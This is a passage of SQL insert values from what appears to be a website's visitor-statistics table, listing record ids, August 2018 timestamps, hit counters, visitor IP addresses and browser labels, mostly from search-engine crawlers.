er'),(284186,1533657884,1,1,0,0,'66.249.66.61','chrome'),(284187,1533657928,2,2,0,0,'69.12.66.247','chrome'),(284188,1533657944,1,1,0,0,'8.29.198.26','other'),(284189,1533658001,1,1,0,0,'54.36.149.8','other'),(284190,1533658191,1,1,0,0,'54.36.148.150','other'),(284191,1533658203,1,1,0,0,'46.211.25.3','firefox'),(284192,1533658301,1,1,0,0,'54.36.148.63','other'),(284193,1533658363,1,1,0,0,'178.154.171.88','other'),(284194,1533658532,1,1,0,0,'54.36.148.123','other'),(284195,1533658575,1,1,0,0,'185.220.101.7','other'),(284196,1533658714,1,1,0,0,'54.36.149.11','other'),(284197,1533659297,1,0,1,0,'66.249.66.156',''),(284198,1533659365,1,1,0,0,'54.36.148.136','other'),(284199,1533659703,1,1,0,0,'8.29.198.26','other'),(284200,1533659707,1,1,0,0,'66.249.66.157','chrome'),(284201,1533659780,1,1,0,0,'54.36.148.228','other'),(284202,1533659955,1,1,0,0,'141.8.142.74','other'),(284203,1533659962,1,1,0,0,'87.250.224.46','other'),(284204,1533660018,1,1,0,0,'216.244.66.241','other'),(284205,1533660019,1,1,0,0,'54.36.148.103','other'),(284206,1533660021,1,1,0,0,'54.36.148.100','other'),(284207,1533660195,1,1,0,0,'54.36.148.91','other'),(284208,1533660886,1,1,0,0,'178.154.171.88','other'),(284209,1533661074,1,1,0,0,'54.36.148.46','other'),(284210,1533661426,1,1,0,0,'54.36.148.90','other'),(284211,1533661467,1,1,0,0,'54.36.149.33','other'),(284212,1533661616,1,1,0,0,'54.36.148.97','other'),(284213,1533661645,1,1,0,0,'66.249.66.156','chrome'),(284214,1533661731,1,1,0,0,'54.36.148.204','other'),(284215,1533661819,1,1,0,0,'54.36.148.58','other'),(284216,1533661949,1,1,0,0,'141.8.142.74','other'),(284217,1533662043,1,1,0,0,'40.77.167.114','other'),(284218,1533662122,4,4,0,0,'216.244.66.241','other'),(284219,1533662129,1,1,0,0,'54.36.148.231','other'),(284220,1533662137,1,1,0,0,'185.100.86.154','other'),(284221,1533662213,1,1,0,0,'54.36.148.203','other'),(284222,1533662288,1,1,0,0,'207.46.13.188','other'),(284223,1533662481,1,1,0,0,'54.36.148.193','other'),(284224,1533662500,1,1,0,0,'54.36.148.31','other'),(284225,1533662685,1,1,0,0,'54.36.148.224','other'),(284226,1533662758,1,1,0,0,'54.36.148.159','other'),(284227,1533662816,1,1,0,0,'54.36.149.55','other'),(284228,1533663127,1,1,0,0,'54.36.149.101','other'),(284229,1533663644,1,1,0,0,'66.249.66.157','chrome'),(284230,1533663713,1,1,0,0,'87.250.224.46','other'),(284231,1533663748,1,1,0,0,'54.36.149.98','other'),(284232,1533663754,1,0,1,0,'66.249.66.155',''),(284233,1533663835,1,1,0,0,'54.36.148.49','other'),(284234,1533664199,1,1,0,0,'54.36.149.24','other'),(284235,1533664507,1,1,0,0,'54.36.148.18','other'),(284236,1533664554,1,1,0,0,'54.36.148.203','other'),(284237,1533664853,1,1,0,0,'54.36.148.119','other'),(284238,1533664889,3,3,0,0,'216.244.66.241','other'),(284239,1533665163,1,1,0,0,'54.36.149.2','other'),(284240,1533665248,1,1,0,0,'95.163.255.175','other'),(284241,1533665742,1,1,0,0,'51.15.86.162','other'),(284242,1533665964,1,1,0,0,'54.36.148.180','other'),(284243,1533666079,1,1,0,0,'54.36.148.128','other'),(284244,1533666156,1,0,1,0,'66.249.66.157',''),(284245,1533666258,1,1,0,0,'54.36.148.57','other'),(284246,1533666316,1,1,0,0,'40.77.167.114','other'),(284247,1533666317,1,1,0,0,'46.185.2.145','chrome'),(284248,1533666339,1,1,0,0,'54.36.148.238','other'),(284249,1533666571,1,1,0,0,'180.76.15.138','other'),(284250,1533666873,1,0,1,0,'66.249.66.155',''),(284251,1533666924,1,1,0,0,'54.36.148.137','other'),(284252,1533667126,1,1,0,0,'54.36.148.218','other'),(284253,1533667383,1,1,0,0,'54.36.148.34','other'),(284254,1533667474,1,1,0,0,'54.36.148.221','other'),(284255,1533667555,2,2,0,0,'178.154.171.88','other'),(284256,1533667567,1,1,0,0,'54.36.149.56','other'),(284257,1533667889,1,1,0,0,'54.36.149.12','other'),(284258,1533668028,1,1,0,0,'54.36.148.181','other'),(284259,1533668146,1,1,0,0,'54.36.148.176','other'),(284260,1533668258,1,1,0,0,'54.36.149.43','other'),(284261,1533668294,1,1,0,0,'93.170.117.63','chrome'),(284262,1533668317,1,1,0,0,'178.154.200.41','other'),(284263,1533668399,1,1,0,0,'216.244.66.241','other'),(284264,1533668435,1,1,0,0,'54.36.148.107','other'),(284265,1533668825,1,1,0,0,'8.29.198.26','other'),(284266,1533669119,1,1,0,0,'54.36.148.65','other'),(284267,1533669228,1,1,0,0,'54.36.148.60','other'),(284268,1533669275,1,1,0,0,'54.36.148.224','other'),(284269,1533669517,1,1,0,0,'148.251.120.201','other'),(284270,1533669568,1,1,0,0,'54.36.148.229','other'),(284271,1533669697,1,1,0,0,'54.36.148.139','other'),(284272,1533669978,1,1,0,0,'54.36.149.59','other'),(284273,1533670288,1,1,0,0,'54.36.148.45','other'),(284274,1533670393,1,1,0,0,'54.36.148.237','other'),(284275,1533670620,1,1,0,0,'8.29.198.27','other'),(284276,1533670727,1,1,0,0,'54.36.148.41','other'),(284277,1533670876,1,1,0,0,'54.36.148.247','other'),(284278,1533671237,1,1,0,0,'54.36.149.67','other'),(284279,1533671287,2,2,0,0,'54.36.148.37','other'),(284280,1533671500,1,1,0,0,'141.8.142.74','other'),(284281,1533671854,1,1,0,0,'54.36.148.89','other'),(284282,1533671956,1,1,0,0,'54.36.148.75','other'),(284283,1533672062,1,1,0,0,'54.36.148.40','other'),(284284,1533672217,1,1,0,0,'54.36.148.19','other'),(284285,1533672321,1,1,0,0,'54.36.148.74','other'),(284286,1533672336,1,1,0,0,'54.36.148.213','other'),(284287,1533672578,1,1,0,0,'54.36.148.245','other'),(284288,1533672689,1,1,0,0,'87.250.224.46','other'),(284289,1533672735,1,1,0,0,'95.216.5.188','other'),(284290,1533672866,1,1,0,0,'54.36.149.55','other'),(284291,1533672920,1,1,0,0,'54.36.148.63','other'),(284292,1533672996,1,1,0,0,'54.36.148.235','other'),(284293,1533673205,1,1,0,0,'54.36.148.177','other'),(284294,1533673252,3,3,0,0,'216.244.66.241','other'),(284295,1533673486,1,1,0,0,'82.145.208.148','other'),(284296,1533673660,2,2,0,0,'141.8.142.74','other'),(284297,1533673910,1,1,0,0,'54.36.148.221','other'),(284298,1533674126,1,1,0,0,'54.36.148.224','other'),(284299,1533674278,1,1,0,0,'54.36.148.57','other'),(284300,1533674316,1,1,0,0,'54.36.148.13','other'),(284301,1533674459,1,1,0,0,'54.36.148.251','other'),(284302,1533674597,1,1,0,0,'54.36.149.25','other'),(284303,1533674636,1,1,0,0,'54.36.149.102','other'),(284304,1533674647,1,1,0,0,'54.36.149.100','other'),(284305,1533674748,1,1,0,0,'54.36.148.32','other'),(284306,1533674830,1,1,0,0,'54.36.148.102','other'),(284307,1533675161,6,6,0,0,'216.244.66.241','other'),(284308,1533675342,1,1,0,0,'54.36.149.52','other'),(284309,1533675643,1,1,0,0,'37.9.113.182','other'),(284310,1533676096,1,1,0,0,'216.244.66.241','other'),(284311,1533676265,1,1,0,0,'54.36.148.196','other'),(284312,1533676433,1,1,0,0,'54.36.148.181','other'),(284313,1533676538,1,1,0,0,'185.117.215.9','other'),(284314,1533676697,1,1,0,0,'207.46.13.87','other'),(284315,1533676736,1,1,0,0,'178.154.171.88','other'),(284316,1533676827,1,1,0,0,'54.36.148.123','other'),(284317,1533676958,1,1,0,0,'54.36.148.184','other'),(284318,1533676993,1,1,0,0,'141.8.142.74','other'),(284319,1533677307,1,1,0,0,'54.36.148.142','other'),(284320,1533677351,1,1,0,0,'54.36.149.55','other'),(284321,1533677446,1,1,0,0,'77.121.72.189','chrome'),(284322,1533677480,1,1,0,0,'54.36.148.199','other'),(284323,1533677699,1,1,0,0,'54.36.148.45','other'),(284324,1533677911,1,1,0,0,'51.255.65.46','other'),(284325,1533677979,1,1,0,0,'54.36.148.195','other'),(284326,1533678015,6,6,0,0,'216.244.66.241','other'),(284327,1533678241,1,1,0,0,'54.36.148.161','other'),(284328,1533678640,1,1,0,0,'54.36.148.235','other'),(284329,1533679059,1,1,0,0,'54.36.149.57','other'),(284330,1533679137,1,1,0,0,'54.36.148.61','other'),(284331,1533679203,1,1,0,0,'54.36.148.97','other'),(284333,1533679685,1,1,0,0,'8.29.198.27','other'),(284334,1533679716,1,1,0,0,'54.36.148.207','other'),(284335,1533679846,1,1,0,0,'54.36.148.173','other'),(284336,1533680068,1,1,0,0,'54.36.149.75','other'),(284337,1533680138,1,1,0,0,'46.165.230.5','other'),(284338,1533680189,1,1,0,0,'54.36.148.25','other'),(284339,1533680200,1,1,0,0,'37.187.94.86','chrome'),(284340,1533680387,1,1,0,0,'54.36.148.239','other'),(284341,1533680927,1,1,0,0,'141.8.142.74','other'),(284342,1533681012,1,1,0,0,'54.36.148.228','other'),(284343,1533681282,1,1,0,0,'95.163.255.153','other'),(284344,1533681521,1,1,0,0,'8.29.198.26','other'),(284345,1533681622,1,1,0,0,'54.36.149.6','other'),(284346,1533681745,1,1,0,0,'54.36.148.19','other'),(284347,1533681759,1,1,0,0,'54.36.148.246','other'),(284348,1533681921,1,1,0,0,'54.36.149.74','other'),(284349,1533681924,1,1,0,0,'54.36.148.164','other'),(284350,1533682039,1,1,0,0,'54.36.149.17','other'),(284351,1533682199,1,1,0,0,'54.36.148.75','other'),(284352,1533682351,1,1,0,0,'54.36.149.103','other'),(284353,1533682367,1,0,1,0,'66.249.66.155',''),(284354,1533682390,1,1,0,0,'54.36.148.237','other'),(284355,1533682743,1,1,0,0,'54.36.149.75','other'),(284356,1533683073,1,1,0,0,'54.36.148.174','other'),(284357,1533683742,1,1,0,0,'185.220.101.10','other'),(284358,1533684322,1,1,0,0,'54.36.148.178','other'),(284359,1533684361,2,2,0,0,'216.244.66.241','other'),(284360,1533684371,1,1,0,0,'54.36.148.39','other'),(284361,1533684391,1,1,0,0,'54.36.148.183','other'),(284362,1533684485,1,1,0,0,'54.36.149.102','other'),(284363,1533684641,1,1,0,0,'95.163.255.105','other'),(284364,1533684648,1,1,0,0,'95.163.255.119','other'),(284365,1533684660,1,1,0,0,'207.46.13.188','other'),(284366,1533684781,1,1,0,0,'54.36.148.88','other'),(284367,1533685105,1,1,0,0,'180.76.15.138','other'),(284368,1533685192,1,1,0,0,'54.36.149.58','other'),(284369,1533685263,1,1,0,0,'54.36.148.252','other'),(284370,1533685394,1,1,0,0,'54.36.149.64','other'),(284371,1533685427,1,1,0,0,'54.36.148.243','other'),(284372,1533685586,1,1,0,0,'54.36.149.81','other'),(284373,1533685598,1,0,1,0,'66.249.66.59',''),(284374,1533685853,1,1,0,0,'54.36.149.38','other'),(284375,1533686159,1,1,0,0,'54.36.148.78','other'),(284376,1533686172,1,1,0,0,'54.36.148.75','other'),(284377,1533686313,1,1,0,0,'54.36.148.174','other'),(284378,1533686582,1,1,0,0,'54.36.148.122','other'),(284379,1533686955,1,1,0,0,'54.36.148.86','other'),(284380,1533687142,1,1,0,0,'54.36.149.77','other'),(284381,1533687337,1,1,0,0,'185.220.101.29','other'),(284382,1533687414,1,1,0,0,'178.154.171.88','other'),(284383,1533687616,1,1,0,0,'54.36.148.184','other'),(284384,1533688295,1,1,0,0,'54.36.148.109','other'),(284385,1533688296,1,1,0,0,'216.244.66.241','other'),(284386,1533688724,1,1,0,0,'54.36.149.52','other'),(284387,1533688809,1,1,0,0,'54.36.148.78','other'),(284388,1533689150,2,2,0,0,'54.36.148.60','other'),(284389,1533689249,1,0,1,0,'66.249.66.57',''),(284390,1533689254,1,1,0,0,'54.36.149.44','other'),(284391,1533689404,1,1,0,0,'54.36.149.42','other'),(284392,1533689484,1,1,0,0,'37.57.0.210','chrome'),(284393,1533690089,1,1,0,0,'54.36.148.81','other'),(284394,1533690187,1,1,0,0,'54.36.148.114','other'),(284395,1533690540,1,1,0,0,'8.29.198.26','other'),(284396,1533690779,2,2,0,0,'141.8.142.74','other'),(284397,1533690925,1,1,0,0,'54.36.149.10','other'),(284398,1533690926,1,1,0,0,'54.36.189.105','other'),(284399,1533691029,1,1,0,0,'35.162.70.167','chrome'),(284400,1533691212,1,1,0,0,'54.36.149.29','other'),(284401,1533691379,1,1,0,0,'54.36.148.121','other'),(284402,1533691390,1,1,0,0,'54.36.149.82','other'),(284403,1533691876,1,1,0,0,'54.36.149.15','other'),(284404,1533692169,1,1,0,0,'54.36.148.219','other'),(284405,1533692402,1,1,0,0,'8.29.198.26','other'),(284406,1533692474,1,1,0,0,'95.163.255.154','other'),(284407,1533692503,1,1,0,0,'54.36.148.61','other'),(284408,1533692707,1,1,0,0,'54.36.148.215','other'),(284409,1533692831,2,2,0,0,'216.244.66.241','other'),(284410,1533692886,1,1,0,0,'54.36.148.151','other'),(284411,1533693173,1,1,0,0,'54.36.148.99','other'),(284412,1533693269,1,1,0,0,'51.255.65.46','other'),(284413,1533693435,3,3,0,0,'141.8.142.74','other'),(284414,1533693495,1,1,0,0,'54.36.148.73','other'),(284415,1533693527,1,1,0,0,'54.36.148.234','other'),(284416,1533693533,1,1,0,0,'54.36.148.213','other'),(284417,1533693778,2,2,0,0,'172.241.112.83','other'),(284418,1533694006,1,1,0,0,'54.36.148.42','other'),(284419,1533694135,1,1,0,0,'54.36.149.64','other'),(284420,1533694524,1,1,0,0,'185.220.102.8','other'),(284421,1533694656,1,1,0,0,'54.36.148.144','other'),(284422,1533694954,3,3,0,0,'141.8.142.74','other'),(284423,1533695142,1,1,0,0,'54.36.148.178','other'),(284424,1533695338,1,1,0,0,'54.36.148.202','other'),(284425,1533695453,1,1,0,0,'54.36.148.112','other'),(284426,1533695759,1,1,0,0,'54.36.149.44','other'),(284427,1533695791,1,1,0,0,'54.36.148.122','other'),(284428,1533695830,1,1,0,0,'180.76.15.159','other'),(284429,1533696032,1,1,0,0,'54.36.148.238','other'),(284430,1533696241,1,1,0,0,'54.36.148.164','other'),(284431,1533696337,1,1,0,0,'178.154.171.88','other'),(284432,1533696390,1,1,0,0,'216.244.66.241','other'),(284433,1533697540,1,1,0,0,'54.36.149.71','other'),(284434,1533697931,1,1,0,0,'54.36.148.131','other'),(284435,1533698137,1,1,0,0,'93.115.95.205','other'),(284436,1533698139,1,1,0,0,'54.36.148.182','other'),(284437,1533698155,2,2,0,0,'216.244.66.241','other'),(284438,1533698363,1,1,0,0,'54.36.148.102','other'),(284439,1533698662,1,1,0,0,'54.36.148.137','other'),(284440,1533698700,1,1,0,0,'54.36.149.11','other'),(284441,1533698761,2,2,0,0,'141.8.142.74','other'),(284442,1533699248,2,2,0,0,'144.76.29.84','other'),(284443,1533699298,1,1,0,0,'54.36.148.145','other'),(284444,1533699576,1,1,0,0,'54.36.148.213','other'),(284445,1533699778,1,1,0,0,'91.196.178.135','firefox'),(284446,1533699791,1,1,0,0,'54.36.148.87','other'),(284447,1533699811,1,1,0,0,'54.36.148.241','other'),(284448,1533699947,1,1,0,0,'141.8.142.74','other'),(284449,1533699951,1,1,0,0,'37.9.113.182','other'),(284450,1533699957,1,0,1,0,'66.249.66.156',''),(284451,1533699963,1,1,0,0,'54.36.148.110','other'),(284452,1533699994,1,1,0,0,'54.36.148.186','other'),(284453,1533700188,1,1,0,0,'54.36.148.154','other'),(284454,1533700624,3,3,0,0,'216.244.66.241','other'),(284455,1533700625,1,1,0,0,'5.9.107.211','other'),(284456,1533700952,1,1,0,0,'54.36.148.38','other'),(284457,1533701386,1,1,0,0,'8.29.198.25','other'),(284458,1533701774,1,1,0,0,'54.36.148.244','other'),(284459,1533702015,1,1,0,0,'54.36.148.77','other'),(284460,1533702147,1,1,0,0,'178.154.171.88','other'),(284461,1533702198,1,1,0,0,'54.36.149.37','other'),(284462,1533702247,1,1,0,0,'54.36.148.209','other'),(284463,1533702363,1,1,0,0,'54.36.148.140','other'),(284464,1533702369,1,1,0,0,'207.46.13.188','other'),(284465,1533702564,1,1,0,0,'54.36.148.232','other'),(284466,1533702787,1,1,0,0,'54.36.149.54','other'),(284467,1533702938,1,0,1,0,'66.249.66.156',''),(284468,1533703072,1,1,0,0,'54.36.149.72','other'),(284469,1533703205,1,1,0,0,'141.8.142.74','other'),(284470,1533703238,5,5,0,0,'216.244.66.241','other'),(284471,1533703246,1,1,0,0,'54.36.148.102','other'),(284472,1533703251,1,1,0,0,'178.154.171.88','other'),(284473,1533703273,1,1,0,0,'8.29.198.26','other'),(284474,1533703379,1,1,0,0,'54.36.148.193','other'),(284475,1533703381,1,1,0,0,'207.46.13.188','other'),(284476,1533703391,1,1,0,0,'54.36.148.201','other'),(284477,1533703532,1,1,0,0,'54.36.148.126','other'),(284478,1533703555,1,1,0,0,'66.249.66.156','chrome'),(284479,1533703573,1,1,0,0,'54.36.149.9','other'),(284480,1533703645,1,1,0,0,'54.36.148.223','other'),(284481,1533703672,1,1,0,0,'54.36.148.197','other'),(284482,1533703820,1,1,0,0,'54.36.148.101','other'),(284483,1533703842,1,1,0,0,'54.36.149.56','other'),(284484,1533703902,1,1,0,0,'54.36.149.1','other'),(284485,1533703968,1,1,0,0,'54.36.148.248','other'),(284486,1533703986,2,2,0,0,'95.213.141.126','opera'),(284487,1533704347,1,1,0,0,'54.36.148.88','other'),(284488,1533704461,1,1,0,0,'54.36.149.17','other'),(284489,1533704575,1,1,0,0,'54.36.148.138','other'),(284490,1533704621,2,2,0,0,'54.36.149.94','other'),(284491,1533704756,1,1,0,0,'54.36.148.251','other'),(284492,1533705196,1,1,0,0,'54.36.148.202','other'),(284493,1533705328,1,1,0,0,'78.109.23.1','other'),(284494,1533705604,1,1,0,0,'54.36.148.86','other'),(284495,1533705688,1,1,0,0,'91.196.177.46','chrome'),(284496,1533705704,5,5,0,0,'216.244.66.241','other'),(284497,1533705911,1,1,0,0,'46.211.155.113','other'),(284498,1533706066,1,1,0,0,'95.163.255.196','other'),(284499,1533706550,1,1,0,0,'141.8.142.74','other'),(284500,1533706612,1,1,0,0,'54.36.148.171','other'),(284501,1533706619,1,1,0,0,'54.36.148.84','other'),(284502,1533706672,1,1,0,0,'216.244.66.241','other'),(284503,1533706825,1,1,0,0,'54.36.149.58','other'),(284504,1533707185,1,1,0,0,'54.36.148.167','other'),(284505,1533707382,1,1,0,0,'54.36.148.142','other'),(284506,1533707469,1,1,0,0,'54.36.149.23','other'),(284507,1533707500,1,1,0,0,'54.36.148.73','other'),(284508,1533707530,1,1,0,0,'54.36.149.98','other'),(284509,1533707670,1,1,0,0,'54.36.148.108','other'),(284510,1533707825,1,1,0,0,'178.154.171.88','other'),(284511,1533707829,1,1,0,0,'207.46.13.87','other'),(284512,1533707930,1,1,0,0,'54.36.148.101','other'),(284513,1533708016,1,1,0,0,'54.36.148.24','other'),(284514,1533708139,1,1,0,0,'54.36.148.247','other'),(284515,1533708197,1,1,0,0,'54.36.148.110','other'),(284516,1533708258,1,1,0,0,'91.196.178.80','chrome'),(284517,1533708345,1,1,0,0,'54.36.148.233','other'),(284518,1533708481,1,1,0,0,'54.36.149.107','other'),(284519,1533708665,1,1,0,0,'54.36.148.144','other'),(284520,1533708843,1,1,0,0,'91.196.178.88','chrome'),(284521,1533708934,1,1,0,0,'62.210.13.58','other'),(284522,1533709039,2,0,2,0,'66.249.66.155',''),(284523,1533709048,2,2,0,0,'91.196.178.169','chrome'),(284524,1533709226,1,1,0,0,'54.36.148.85','other'),(284525,1533709477,1,1,0,0,'66.102.9.35','chrome'),(284526,1533709493,1,1,0,0,'141.8.142.167','other'),(284527,1533709498,1,1,0,0,'91.196.178.80','chrome'),(284528,1533709605,1,1,0,0,'54.36.148.193','other'),(284529,1533709752,1,0,1,0,'66.249.66.157',''),(284530,1533709757,1,1,0,0,'54.36.148.194','other'),(284531,1533709789,1,1,0,0,'54.36.148.216','other'),(284532,1533710019,1,1,0,0,'54.36.148.149','other'),(284533,1533710051,1,1,0,0,'54.36.148.162','other'),(284534,1533710098,1,1,0,0,'54.36.148.140','other'),(284535,1533710135,1,1,0,0,'54.36.149.32','other'),(284536,1533710275,1,1,0,0,'54.36.148.191','other'),(284537,1533710294,2,2,0,0,'46.211.129.53','chrome'),(284538,1533710404,1,1,0,0,'54.36.149.6','other'),(284539,1533710540,2,2,0,0,'141.8.142.74','other'),(284540,1533710966,1,1,0,0,'95.132.38.98','chrome'),(284541,1533710971,1,1,0,0,'216.244.66.241','other'),(284542,1533711077,1,1,0,0,'54.36.149.55','other'),(284543,1533711192,1,1,0,0,'54.36.148.151','other'),(284544,1533711200,1,1,0,0,'54.36.148.104','other'),(284545,1533711372,2,2,0,0,'91.196.178.90','firefox'),(284546,1533711376,1,1,0,0,'54.36.149.82','other'),(284547,1533711648,1,1,0,0,'54.36.148.194','other'),(284548,1533711651,1,1,0,0,'54.36.148.37','other'),(284549,1533711667,1,1,0,0,'54.36.148.128','other'),(284550,1533711774,1,1,0,0,'141.8.142.74','other'),(284551,1533711840,1,1,0,0,'54.36.148.184','other'),(284552,1533711978,1,1,0,0,'54.36.148.217','other'),(284553,1533712148,1,1,0,0,'54.36.149.54','other'),(284554,1533712208,1,1,0,0,'54.36.149.24','other'),(284555,1533712210,1,1,0,0,'54.36.148.152','other'),(284556,1533712234,1,1,0,0,'8.29.198.25','other'),(284557,1533712278,1,1,0,0,'91.196.178.71','firefox'),(284558,1533712525,1,1,0,0,'185.220.101.0','other'),(284559,1533712876,1,1,0,0,'178.95.245.89','chrome'),(284560,1533713012,2,2,0,0,'216.244.66.241','other'),(284561,1533713207,1,1,0,0,'141.8.132.19','other'),(284562,1533713232,4,4,0,0,'141.8.142.74','other'),(284563,1533713465,1,1,0,0,'54.36.148.53','other'),(284564,1533713632,1,1,0,0,'54.36.148.148','other'),(284565,1533713764,1,1,0,0,'54.36.148.92','other'),(284566,1533713822,1,0,1,0,'66.249.66.157',''),(284567,1533713884,1,1,0,0,'54.36.148.134','other'),(284568,1533714139,1,1,0,0,'216.244.66.241','other'),(284569,1533714166,1,1,0,0,'8.29.198.26','other'),(284570,1533714216,1,1,0,0,'5.9.154.68','other'),(284571,1533714662,1,1,0,0,'54.36.149.89','other'),(284572,1533714665,1,1,0,0,'54.36.148.110','other'),(284573,1533714730,1,1,0,0,'54.36.148.63','other'),(284574,1533715854,1,1,0,0,'54.36.149.74','other'),(284575,1533715905,3,3,0,0,'216.244.66.241','other'),(284576,1533715906,1,1,0,0,'54.36.149.95','other'),(284577,1533715931,1,1,0,0,'95.135.236.5','chrome'),(284578,1533715940,1,1,0,0,'54.36.148.25','other'),(284579,1533716021,1,1,0,0,'54.36.148.232','other'),(284580,1533716138,1,1,0,0,'185.248.160.214','other'),(284581,1533716218,1,1,0,0,'54.36.148.175','other'),(284582,1533716479,1,1,0,0,'54.36.148.192','other'),(284583,1533716501,3,0,3,0,'66.249.66.155',''),(284584,1533716597,2,1,1,0,'66.249.66.156',''),(284585,1533716866,2,2,0,0,'216.244.66.241','other'),(284586,1533716904,1,1,0,0,'54.36.148.151','other'),(284587,1533716948,2,2,0,0,'91.196.178.75','chrome'),(284588,1533716960,1,0,1,0,'66.249.66.157',''),(284589,1533716971,1,1,0,0,'54.36.148.130','other'),(284590,1533717250,1,1,0,0,'54.36.148.159','other'),(284591,1533717273,1,1,0,0,'54.36.148.108','other'),(284592,1533717276,1,1,0,0,'54.36.148.28','other'),(284593,1533717490,1,1,0,0,'91.196.178.80','chrome'),(284594,1533717758,1,1,0,0,'54.36.148.106','other'),(284595,1533717906,1,1,0,0,'157.55.39.244','other'),(284596,1533717915,1,1,0,0,'91.196.178.75','chrome'),(284597,1533718133,1,1,0,0,'178.154.171.88','other'),(284598,1533718324,1,0,1,0,'66.249.66.157',''),(284599,1533718404,1,1,0,0,'54.36.148.246','other'),(284600,1533718547,1,1,0,0,'54.36.149.100','other'),(284601,1533718741,1,1,0,0,'78.154.179.30','chrome'),(284602,1533718773,1,1,0,0,'91.196.177.15','chrome'),(284603,1533718778,1,1,0,0,'54.36.149.10','other'),(284604,1533719063,1,1,0,0,'54.36.148.203','other'),(284605,1533719101,1,1,0,0,'54.36.148.128','other'),(284606,1533719220,1,1,0,0,'54.36.148.228','other'),(284607,1533719363,1,1,0,0,'91.196.178.71','firefox'),(284608,1533719367,1,1,0,0,'95.163.255.172','other'),(284609,1533719487,1,1,0,0,'180.76.15.141','other'),(284610,1533719530,1,1,0,0,'82.145.208.31','other'),(284611,1533719613,1,1,0,0,'54.36.148.101','other'),(284612,1533719733,1,1,0,0,'185.220.101.25','other'),(284613,1533719935,1,1,0,0,'54.36.149.61','other'),(284614,1533720049,1,1,0,0,'54.36.149.36','other'),(284615,1533720344,1,1,0,0,'54.36.148.38','other'),(284616,1533720597,1,1,0,0,'54.36.149.80','other'),(284617,1533720746,1,1,0,0,'54.36.148.252','other'),(284618,1533721050,1,1,0,0,'54.36.148.80','other'),(284619,1533721139,1,1,0,0,'216.244.66.241','other'),(284620,1533721426,1,0,1,0,'66.249.66.155',''),(284621,1533721471,2,0,2,0,'66.249.66.156',''),(284622,1533722062,1,1,0,0,'82.145.208.201','other'),(284623,1533722102,1,1,0,0,'54.36.148.117','other'),(284624,1533722178,1,1,0,0,'54.36.148.84','other'),(284625,1533722330,1,1,0,0,'54.36.148.124','other'),(284626,1533722555,1,1,0,0,'54.36.149.16','other'),(284627,1533722603,1,1,0,0,'82.207.108.163','firefox'),(284628,1533722624,1,1,0,0,'54.36.149.2','other'),(284629,1533722934,1,1,0,0,'54.36.148.76','other'),(284630,1533722978,1,1,0,0,'91.196.178.187','chrome'),(284631,1533723090,1,1,0,0,'8.29.198.25','other'),(284632,1533723137,1,1,0,0,'178.154.171.88','other'),(284633,1533723324,1,1,0,0,'185.117.215.9','other'),(284634,1533723782,1,1,0,0,'141.8.142.74','other'),(284635,1533723871,5,5,0,0,'216.244.66.241','other'),(284636,1533723873,1,1,0,0,'54.36.149.94','other'),(284637,1533724220,1,1,0,0,'54.36.149.72','other'),(284638,1533724383,1,1,0,0,'178.154.171.88','other'),(284639,1533724550,1,1,0,0,'54.36.149.79','other'),(284640,1533724555,1,1,0,0,'91.196.178.172','chrome'),(284641,1533724610,1,1,0,0,'54.36.148.67','other'),(284642,1533724646,1,1,0,0,'54.36.148.60','other'),(284643,1533724710,1,1,0,0,'95.132.45.236','firefox'),(284644,1533724778,1,1,0,0,'54.36.148.220','other'),(284645,1533725037,1,1,0,0,'8.29.198.25','other'),(284646,1533725939,1,1,0,0,'216.244.66.241','other'),(284647,1533726172,1,1,0,0,'157.55.39.244','other'),(284648,1533726337,1,1,0,0,'141.8.142.74','other'),(284649,1533726655,1,1,0,0,'178.95.252.27','chrome'),(284650,1533726830,1,1,0,0,'91.209.11.236','other'),(284651,1533726864,2,2,0,0,'178.154.171.88','other'),(284652,1533726988,1,1,0,0,'51.15.86.162','other'),(284653,1533728137,1,1,0,0,'144.76.29.162','other'),(284654,1533728395,1,1,0,0,'91.196.179.33','firefox'),(284655,1533728568,2,2,0,0,'176.106.3.152','chrome'),(284656,1533728910,1,1,0,0,'91.196.178.80','chrome'),(284657,1533729381,1,1,0,0,'91.196.177.76','chrome'),(284658,1533729561,1,1,0,0,'91.196.178.172','chrome'),(284659,1533729938,1,0,1,0,'66.249.66.155',''),(284660,1533730022,1,1,0,0,'141.8.142.74','other'),(284661,1533730312,1,1,0,0,'194.44.121.243','chrome'),(284662,1533730531,1,1,0,0,'137.74.169.241','other'),(284663,1533730572,2,2,0,0,'178.154.171.88','other'),(284664,1533731527,1,1,0,0,'162.210.196.129','other'),(284665,1533731764,1,1,0,0,'66.102.9.35','chrome'),(284666,1533731861,3,3,0,0,'216.244.66.241','other'),(284667,1533732004,1,1,0,0,'87.250.224.46','other'),(284668,1533732006,2,2,0,0,'178.154.171.88','other'),(284669,1533732131,1,1,0,0,'37.9.113.115','other'),(284670,1533732133,1,1,0,0,'141.8.142.74','other'),(284671,1533732589,1,1,0,0,'91.196.178.186','chrome'),(284672,1533733638,3,3,0,0,'216.244.66.241','other'),(284673,1533733821,1,1,0,0,'92.112.105.243','chrome'),(284674,1533733939,1,1,0,0,'8.29.198.25','other'),(284675,1533734136,1,1,0,0,'94.16.123.176','other'),(284676,1533734155,1,1,0,0,'91.196.178.65','firefox'),(284677,1533734487,1,1,0,0,'91.196.178.129','firefox'),(284678,1533734586,2,2,0,0,'216.244.66.241','other'),(284679,1533734607,1,1,0,0,'188.163.100.17','chrome'),(284680,1533734696,1,1,0,0,'91.196.177.46','chrome'),(284681,1533734794,1,1,0,0,'95.163.255.92','other'),(284682,1533735058,2,2,0,0,'91.196.178.169','chrome'),(284683,1533735095,1,0,1,0,'66.249.66.155',''),(284684,1533735143,1,1,0,0,'95.132.5.94','chrome'),(284685,1533735523,1,1,0,0,'95.134.202.159','chrome'),(284686,1533735927,1,1,0,0,'8.29.198.26','other'),(284687,1533736005,1,1,0,0,'91.196.178.80','chrome'),(284688,1533736077,1,1,0,0,'95.132.5.94','chrome'),(284689,1533736222,1,1,0,0,'178.154.171.88','other'),(284690,1533736629,1,1,0,0,'141.8.142.74','other'),(284691,1533736969,1,1,0,0,'91.196.178.82','firefox'),(284692,1533736990,1,1,0,0,'91.196.177.46','chrome'),(284693,1533736998,1,1,0,0,'95.132.5.94','chrome'),(284694,1533737631,2,2,0,0,'216.244.66.241','other'),(284695,1533737738,1,1,0,0,'178.175.129.91','other'),(284696,1533739568,3,3,0,0,'216.244.66.241','other'),(284697,1533741042,1,1,0,0,'178.154.171.88','other'),(284698,1533741386,1,1,0,0,'185.220.101.15','other'),(284699,1533741721,1,0,1,0,'66.249.66.61',''),(284700,1533741737,1,0,1,0,'66.249.66.